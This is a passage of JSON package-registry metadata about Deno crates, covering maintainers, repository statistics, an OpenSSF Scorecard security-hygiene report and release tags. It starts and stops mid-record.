leysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":375,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"dsherret","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:28.472Z","updated_at":"2022-11-07T18:29:28.472Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:28.482Z","updated_at":"2022-11-07T18:29:28.482Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"},{"uuid":"50060","login":"afinch7","name":"andy finch","email":null,"url":"https://github.com/afinch7","packages_count":1,"html_url":"https://crates.io/users/afinch7","role":null,"created_at":"2022-11-07T18:29:28.490Z","updated_at":"2022-11-07T18:29:28.490Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/afinch7/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12089361,"name":"deno_bundle_runtime","ecosystem":"cargo","description":"Bundle runtime API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":44,"first_release_published_at":"2025-09-10T04:36:51.696Z","latest_release_published_at":"2026-08-27T15:22:20.050Z","latest_release_number":"0.45.0","last_synced_at":"2026-09-07T22:53:48.581Z","created_at":"2025-09-10T04:47:20.210Z","updated_at":"2026-09-07T22:53:48.582Z","registry_url":"https://crates.io/crates/deno_bundle_runtime/","install_command":"cargo install deno_bundle_runtime","documentation_url":"https://docs.rs/deno_bundle_runtime/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo